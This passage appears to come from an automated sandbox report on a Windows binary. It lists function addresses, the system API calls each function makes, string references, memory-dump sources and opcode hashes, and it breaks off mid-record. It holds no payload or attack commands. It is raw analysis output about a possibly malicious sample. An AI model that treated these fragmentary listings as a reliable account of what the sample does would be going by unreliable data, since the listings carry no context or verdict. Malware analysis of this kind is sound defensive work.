                                              Similarity
                                              • API ID: CloseOpenQueryValue
                                              • String ID: Control Panel\Mouse
                                              • API String ID: 3677997916-824357125
                                              • Opcode ID: 05d4189d37399ec2638d2ad900412f846ad6395af1d7f0a9477540e5920bfcda
                                              • Instruction ID: a24a63762b7bddf8df2018b8dc999da7022fe3b4292bb5cca21b9107f192a565
                                              • Opcode Fuzzy Hash: 05d4189d37399ec2638d2ad900412f846ad6395af1d7f0a9477540e5920bfcda
                                              • Instruction Fuzzy Hash: 4B117CB2610608BFDB209FA4CC40DEF7BBCEF04744F409569F809E7120EA719E40A760
                                              Function 00EDE71E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28libraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 00EDE73D
                                              • FreeLibrary.KERNEL32 ref: 00EDE763
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: AddressFreeLibraryProc
                                              • String ID: GetSystemWow64DirectoryW$X64
                                              • API String ID: 3013587201-2590602151
                                              • Opcode ID: 0aa8944f33cc464f303f22df98988ac673092265ae814491ecde66da370ccb0c
                                              • Instruction ID: fbac4342d4cf48703397a859d66ab63fd736eaa9142dd24b9f5ca633a18d9b08
                                              • Opcode Fuzzy Hash: 0aa8944f33cc464f303f22df98988ac673092265ae814491ecde66da370ccb0c
                                              • Instruction Fuzzy Hash: 29E02B31801620AFEBB66A204C5CAED3224EF10748F191567ED01FA340DB20CC4A9694
                                              Function 00E8F680 Relevance: 6.7, APIs: 2, Strings: 1, Instructions: 1414COMMON
                                              Download Yara Rule
                                              Strings
                                              • Variable must be of type 'Object'., xrefs: 00ED486A
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Variable must be of type 'Object'.
                                              • API String ID: 0-109567571
                                              • Opcode ID: ced954c30d629b5a9748bb494b3a97e3efefd0761cacffb11dd1183ff7eeb8d0
                                              • Instruction ID: dc6bea4e184c1cfdbcf26a734eeb1a36251a62b88a707596f966c757cbbaac3d
                                              • Opcode Fuzzy Hash: ced954c30d629b5a9748bb494b3a97e3efefd0761cacffb11dd1183ff7eeb8d0
                                              • Instruction Fuzzy Hash: 18C25971A002059FCB24DF58C880BADB7F1FF19314F24916AE959BB3A1E771AD42CB91
                                              Function 00EEDA81 Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetFileAttributesW.KERNELBASE(?,00F1DC30), ref: 00EEDABB
                                              • GetLastError.KERNEL32 ref: 00EEDACA
                                              • CreateDirectoryW.KERNELBASE(?,00000000), ref: 00EEDAD9
                                              • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00F1DC30), ref: 00EEDB36
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: CreateDirectory$AttributesErrorFileLast
                                              • String ID:
                                              • API String ID: 2267087916-0
                                              • Opcode ID: 92c5ccae6717f92d27bf7b078c3f6999dbd42535eba2467a774e8d118bbd5cf1
                                              • Instruction ID: f9c9ebdcf61270d68e7685b1e71cf1440949f5e4f08242cdf4436388ca9d8915
                                              • Opcode Fuzzy Hash: 92c5ccae6717f92d27bf7b078c3f6999dbd42535eba2467a774e8d118bbd5cf1
                                              • Instruction Fuzzy Hash: 78217F3050C2499F8700EF25DC818AAB7F8EE55368F155A1DF4ADE72A1E730D94ADB82
                                              Function 00EA016B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                              Download Yara Rule
                                              APIs
                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00EA09F8
                                                • Part of subcall function 00EA3634: RaiseException.KERNEL32(?,?,?,00EA0A1A,?,00000000,?,?,?,?,?,?,00EA0A1A,00000000,00F49758,00000000), ref: 00EA3694
                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00EA0A15
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Exception@8Throw$ExceptionRaise
                                              • String ID: Unknown exception
                                              • API String ID: 3476068407-410509341
                                              • Opcode ID: 110e8a2a2f7e1e31bd0eba5be653cc06b53595d4a37c7278d43ca4f210824ee1
                                              • Instruction ID: 546e98c47e3f9d120c91d09d8b65b8324e7a75b04c65efac4b4e51069ec6ede5
                                              • Opcode Fuzzy Hash: 110e8a2a2f7e1e31bd0eba5be653cc06b53595d4a37c7278d43ca4f210824ee1
                                              • Instruction Fuzzy Hash: 61F0C83450030D778B01BA74D8469DEB7AC5E8A314B505120B814BD4A3EB70FA56C5C0
                                              Function 00EDE59A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: LocalTime
                                              • String ID: %.3d$X64
                                              • API String ID: 481472006-1077770165
                                              • Opcode ID: 0fb6fd8ef403875f645b3d7b5110d4ebc822fcb072dcbdcbc02eec1ce37279dd
                                              • Instruction ID: 331fc58a034bce7b1515843495684fbe7cd7e61ba8c2912cf82c2436ba509432
                                              • Opcode Fuzzy Hash: 0fb6fd8ef403875f645b3d7b5110d4ebc822fcb072dcbdcbc02eec1ce37279dd
                                              • Instruction Fuzzy Hash: 57D012A1C0401CD6CF90AA90994D8FD737CE718740F509453F916F5340EA34D50AAB21
                                              Function 00F088B6 Relevance: 4.9, APIs: 3, Instructions: 430COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00F08C52
                                              • TerminateProcess.KERNEL32(00000000), ref: 00F08C59
                                              • FreeLibrary.KERNEL32(?,?,?,?), ref: 00F08E3A
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Process$CurrentFreeLibraryTerminate
                                              • String ID:
                                              • API String ID: 146820519-0
                                              • Opcode ID: 24eb94c8274e02696065fd00515d47d41188705f3a847dba168c1253fc776a40
                                              • Instruction ID: 9ad916fb9aaffa53ff808b9b2353bfb02758f69bb5c9cf1c7992b91d0e2e1af0
                                              • Opcode Fuzzy Hash: 24eb94c8274e02696065fd00515d47d41188705f3a847dba168c1253fc776a40
                                              • Instruction Fuzzy Hash: 0D127C71A083419FC714DF24C484B6ABBE1FF89364F14895DE8899B392DB30E946DF92
                                              Function 00E82735 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00E83205: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00E83236
                                                • Part of subcall function 00E83205: MapVirtualKeyW.USER32(00000010,00000000), ref: 00E8323E
                                                • Part of subcall function 00E83205: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00E83249
                                                • Part of subcall function 00E83205: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00E83254
                                                • Part of subcall function 00E83205: MapVirtualKeyW.USER32(00000011,00000000), ref: 00E8325C
                                                • Part of subcall function 00E83205: MapVirtualKeyW.USER32(00000012,00000000), ref: 00E83264
                                                • Part of subcall function 00E8318C: RegisterWindowMessageW.USER32(00000004,?,00E82906), ref: 00E831E4
                                              • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00E829AC
                                              • OleInitialize.OLE32 ref: 00E829CA
                                              • CloseHandle.KERNEL32(00000000,00000000), ref: 00EC39E7
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                              • String ID:
                                              • API String ID: 1986988660-0
                                              • Opcode ID: 0ce584cf673f078db08713782a0d7d5b567caa92ec659df6cdd62acf1247f273
                                              • Instruction ID: 1ea7b6466fe40c172e18e196a91ee3671a6c4e164aabeae62e22b7c660fde87b
                                              • Opcode Fuzzy Hash: 0ce584cf673f078db08713782a0d7d5b567caa92ec659df6cdd62acf1247f273
                                              • Instruction Fuzzy Hash: 037199B19013088E87C8EF79AD696553BE0BB5A307B48932AD70DD7262FB305585FF50
                                              Function 00E86BFA Relevance: 4.6, APIs: 3, Instructions: 103COMMON
                                              Download Yara Rule
                                              APIs
                                              • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000001,?,00000000), ref: 00E86CA1
                                              • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001), ref: 00E86CB1
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: FilePointer
                                              • String ID:
                                              • API String ID: 973152223-0
                                              • Opcode ID: 731d2e9408feaf27bb1f737e45c1e7453ae20545c86ea89a0673a90cc6fec2e2
                                              • Instruction ID: 21a00873b0edcc8977ee48193e7cae1ddae7f5461b936bf01191e579a7df79d8
                                              • Opcode Fuzzy Hash: 731d2e9408feaf27bb1f737e45c1e7453ae20545c86ea89a0673a90cc6fec2e2
                                              • Instruction Fuzzy Hash: 93315971A0060AEFDB14DF68C980B99F7B5FB04318F148629E91DA7240C7B1BE94CB90
                                              Function 00E9FCBB Relevance: 4.6, APIs: 3, Instructions: 75timewindowCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00E85F59: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00E86049
                                              • KillTimer.USER32(?,00000001,?,?), ref: 00E9FD44
                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00E9FD53
                                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00EDFDD3
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: IconNotifyShell_Timer$Kill
                                              • String ID:
                                              • API String ID: 3500052701-0
                                              • Opcode ID: 1ce52022cdbe2ab8a945b5d8fa3bc5a1d583a30fe0bb9add4534441baf6657bd
                                              • Instruction ID: d9906ffe207d2743a9e3a7276684cf8f83f297a658f3350a8e65c115cd3ef127
                                              • Opcode Fuzzy Hash: 1ce52022cdbe2ab8a945b5d8fa3bc5a1d583a30fe0bb9add4534441baf6657bd
                                              • Instruction Fuzzy Hash: 1D31B471904754AFEB22CF248845BE6BBEDEF16308F0014AED69EA7281C7745A85CB51
                                              Function 00EB8A3E Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • CloseHandle.KERNELBASE(00000000,00000000,?,?,00EB895C,?,00F49CE8,0000000C), ref: 00EB8A94
                                              • GetLastError.KERNEL32(?,00EB895C,?,00F49CE8,0000000C), ref: 00EB8A9E
                                              • __dosmaperr.LIBCMT ref: 00EB8AC9
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: CloseErrorHandleLast__dosmaperr
                                              • String ID:
                                              • API String ID: 2583163307-0
                                              • Opcode ID: 32e207987a58032802adf3ce24aadd4b0c115d5efc1a4056d51bf5a6e75ed31d
                                              • Instruction ID: b58a61836bb21932ce9e6bc872cb690cd9b1604210316cf53d9f25afa5cb5e40
                                              • Opcode Fuzzy Hash: 32e207987a58032802adf3ce24aadd4b0c115d5efc1a4056d51bf5a6e75ed31d
                                              • Instruction Fuzzy Hash: 83016F3370516056D2942374AA867FF77CD8B81738F39221BF918BB2D2DE209C80D290
                                              Function 00EB971B Relevance: 4.6, APIs: 3, Instructions: 50COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • SetFilePointerEx.KERNELBASE(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,00EB97CA,FF8BC369,00000000,00000002,00000000), ref: 00EB9754
                                              • GetLastError.KERNEL32(?,00EB97CA,FF8BC369,00000000,00000002,00000000,?,00EB5EF1,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00EA6F61), ref: 00EB975E
                                              • __dosmaperr.LIBCMT ref: 00EB9765
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: ErrorFileLastPointer__dosmaperr
                                              • String ID:
                                              • API String ID: 2336955059-0
                                              • Opcode ID: b381a4a81b788189f96a8f84a16baf08f454ce98087429c38b4c14c44677a4c2
                                              • Instruction ID: b3545a5daa88db7b74f687fac18473ad52e82c7aaa950704cff8ef84b0ab6d03
                                              • Opcode Fuzzy Hash: b381a4a81b788189f96a8f84a16baf08f454ce98087429c38b4c14c44677a4c2
                                              • Instruction Fuzzy Hash: CB012D32620528ABCB059F95DC05CDF37A9DB85320B240246F914AB291EF30ED0197D0
                                              Function 00E8F1E8 Relevance: 4.5, APIs: 3, Instructions: 29windowsleepCOMMON
                                              Download Yara Rule
                                              APIs
                                              • TranslateMessage.USER32(?), ref: 00E8F22B
                                              • DispatchMessageW.USER32(?), ref: 00E8F239
                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E8F24F
                                              • Sleep.KERNELBASE(0000000A), ref: 00E8F261
                                              • TranslateAcceleratorW.USER32(?,?,?), ref: 00ED327C
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                                              • String ID:
                                              • API String ID: 3288985973-0
                                              • Opcode ID: 8127110204ac7e39afb206c54aec2af0dd701c8f884d19032f1a386b687b0db5
                                              • Instruction ID: 1a0b989b06d0382e2d1a9e5bf35fbd179b27070664785f94c5cb3c913db21bb7
                                              • Opcode Fuzzy Hash: 8127110204ac7e39afb206c54aec2af0dd701c8f884d19032f1a386b687b0db5
                                              • Instruction Fuzzy Hash: 22F082306043499BEB349BA0CC49FDA73ADEF84315F005A29E64DE31E0DB30954CDB22
                                              Function 00E92AD0 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON
                                              Download Yara Rule
                                              APIs
                                              • __Init_thread_footer.LIBCMT ref: 00E92FB6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Init_thread_footer
                                              • String ID: CALL
                                              • API String ID: 1385522511-4196123274
                                              • Opcode ID: ea9eef6b595c3371a0095a7aba0dd96685d6e60d7450dfe3efeda2dba30df1e0
                                              • Instruction ID: 5bb363d6e6b4239144dba4e4d6c885630fe149c9ba0dc7654a0dcea9dcd61d67
                                              • Opcode Fuzzy Hash: ea9eef6b595c3371a0095a7aba0dd96685d6e60d7450dfe3efeda2dba30df1e0
                                              • Instruction Fuzzy Hash: 02228B70608301AFCB14DF24C480A6ABBF1FF99314F14A95DF99AAB3A1D771E945CB42
                                              Function 00E83A1C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetOpenFileNameW.COMDLG32(?), ref: 00EC4115
                                                • Part of subcall function 00E8557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E85558,?,?,00EC4B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 00E8559E
                                                • Part of subcall function 00E839DE: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00E839FD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Name$Path$FileFullLongOpen
                                              • String ID: X
                                              • API String ID: 779396738-3081909835
                                              • Opcode ID: 3f63c837b5be595176220d043b60cb0cee9e5f7d5897fdabf92c155f152548a6
                                              • Instruction ID: 53ef352ed8c4934c1438a8d71687f1e247e7ce4606afd0bcb9d7964f404b6c2d
                                              • Opcode Fuzzy Hash: 3f63c837b5be595176220d043b60cb0cee9e5f7d5897fdabf92c155f152548a6
                                              • Instruction Fuzzy Hash: 5821D871A002489BCB11EFA8C805BEE7BFCAF49714F005059E50DF7281DBF45A898FA1
                                              Function 00EDE6E1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 11COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetComputerNameW.KERNEL32(?,?), ref: 00EDE6F3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: ComputerName
                                              • String ID: X64
                                              • API String ID: 3545744682-893830106
                                              • Opcode ID: ac9f0106c12c190d18e6cdb8685ee9371525bf7005ce7403408b33c50cf6f209
                                              • Instruction ID: ee158c9bc87a0ec2ed74cd22ce4771412afce5e636fb2de5cf559e11a1c0319d
                                              • Opcode Fuzzy Hash: ac9f0106c12c190d18e6cdb8685ee9371525bf7005ce7403408b33c50cf6f209
                                              • Instruction Fuzzy Hash: 87D0C9B480521CEACF90DF80DC8CDDD737CFB14300F105496F112B2240DB34A9489B10
                                              Function 00EF95F6 Relevance: 3.1, APIs: 2, Instructions: 62COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00E8557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E85558,?,?,00EC4B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 00E8559E
                                              • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00EF9665
                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00EF9673
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: PrivateProfileStringWrite$FullNamePath
                                              • String ID:
                                              • API String ID: 3876400906-0
                                              • Opcode ID: 53d378f4a640946df70f282175db2fee3a2207521deddc3d153e1de3faae0f01
                                              • Instruction ID: 7106034f43f1db122a24871c200902f0b2d094160d374f73e672cb2667596a50
